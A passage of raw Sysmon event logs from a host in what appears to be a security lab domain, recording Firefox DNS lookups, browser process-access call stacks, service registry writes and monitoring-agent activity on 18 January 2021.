14:01:26.013{59A5CD1D-945A-6005-3305-00000000A301}7052s0-2mdn-net.l.google.com0216.58.212.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.012{59A5CD1D-945A-6005-3305-00000000A301}7052googleads4.g.doubleclick.net0type: 5 pagead.l.doubleclick.net;::ffff:216.58.206.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.012{59A5CD1D-945A-6005-3305-00000000A301}7052s0.2mdn.net0type: 5 s0-2mdn-net.l.google.com;::ffff:216.58.212.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:25.201{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.201{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.189{59A5CD1D-8E56-6005-2E00-00000000A301}246416.249.124.192.in-addr.arpa.0type: 12 cloudproxy10016.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.186{59A5CD1D-8E56-6005-2E00-00000000A301}2464174.23.217.172.in-addr.arpa.0type: 12 fra15s22-in-f14.1e100.net;type: 12 fra15s22-in-f174.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.185{59A5CD1D-8E56-6005-2E00-00000000A301}246424.249.124.192.in-addr.arpa.0type: 12 cloudproxy10024.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.184{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de02a00:1450:4001:800::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.182{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de0172.217.18.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.181{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de0::ffff:172.217.18.163;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.949{59A5CD1D-945A-6005-3305-00000000A301}7052stats.l.doubleclick.net02a00:1450:400c:c0b::9c;2a00:1450:400c:c0b::9d;2a00:1450:400c:c0b::9a;2a00:1450:400c:c0b::9b;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.948{59A5CD1D-945A-6005-3305-00000000A301}7052stats.l.doubleclick.net0108.177.15.154;108.177.15.155;108.177.15.156;108.177.15.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.947{59A5CD1D-945A-6005-3305-00000000A301}7052stats.g.doubleclick.net0type: 5 stats.l.doubleclick.net;::ffff:108.177.15.157;::ffff:108.177.15.154;::ffff:108.177.15.155;::ffff:108.177.15.156;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.189{59A5CD1D-8E56-6005-2E00-00000000A301}2464157.15.177.108.in-addr.arpa.0type: 12 wr-in-f157.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.015{59A5CD1D-945A-6005-3305-00000000A301}7052pagead.l.doubleclick.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.190{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.18.217.172.in-addr.arpa.0type: 12 fra15s29-in-f3.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:27.190{59A5CD1D-8E56-6005-2E00-00000000A301}24642.206.58.216.in-addr.arpa.0type: 12 fra16s20-in-f2.1e100.net;C:\Windows\sysmon64.exe 
10341000x800000000000000018303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:34.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:34.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 13241300x800000000000000018319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000018318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000018317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000018316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6eda2-0x704abb36) 13241300x800000000000000018315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000018314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000018313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.343{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla 
Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.266{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.266{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.219{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla 
Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.219{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla 
Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.186{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net02a00:1450:4001:815::2002;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.074{59A5CD1D-945A-6005-3305-00000000A301}7052www.llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogochuchaf.eu9003-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.181{59A5CD1D-945A-6005-3305-00000000A301}7052prod-tp.sumo.mozit.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.180{59A5CD1D-945A-6005-3305-00000000A301}7052prod-tp.sumo.mozit.cloud044.238.113.124;34.214.67.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.179{59A5CD1D-945A-6005-3305-00000000A301}7052support.mozilla.org0type: 5 prod-tp.sumo.mozit.cloud;::ffff:34.214.67.134;::ffff:44.238.113.124;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 